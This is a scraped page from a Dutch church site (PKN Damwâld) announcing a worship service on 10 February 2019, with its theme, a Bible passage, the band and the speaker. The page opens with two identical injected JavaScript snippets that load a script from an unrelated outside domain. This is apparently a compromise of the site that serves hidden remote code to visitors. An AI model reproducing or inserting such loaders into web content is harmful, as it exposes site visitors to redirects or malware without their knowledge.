;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Aanbiddingsdienst - PKN Damwâld
10 februari 2019
14:00 t/m 15:00
De Ikker
Aanbiddingsdienst

Je bent van harte welkom bij de aanbiddingsdienst op 10 februari om 14:00 in de Ikker. Het thema is “vol ontzag”.  In de aanbiddingsdienst worden verschillende liederen achter elkaar gezongen; dus zonder veel onderbreking. De bedoeling is, dat we juist zo in een houding van aanbidding komen.
Als je in de Alpen bent, kan je vol ontzag zijn over de grootheid van God. Met die houding van ontzag mogen we voor God komen en Hem vereren. In Fil.2 vers 9 – 11 staat over de Here Jezus, dat: “God Hem ook bovenmate (heeft) verhoogd en heeft Hem een Naam geschonken boven alle naam, opdat in de Naam van Jezus zich zou buigen elke knie van hen die in de hemel, en die op de aarde, en die onder de aarde zijn, en elke tong zou belijden dat Jezus Christus de Here is, tot heerlijkheid van God de Vader”. Die houding van eer en aanbidding wordt ook uitgedrukt in de dienst. Na de liederen zal de preek gehouden worden. De dienst wordt begeleid door de band “Lost and Found” uit Emmeloord. Spreker is onder andere ds. Otter.

Locatie: De IkkerHearewei 1, Damwâld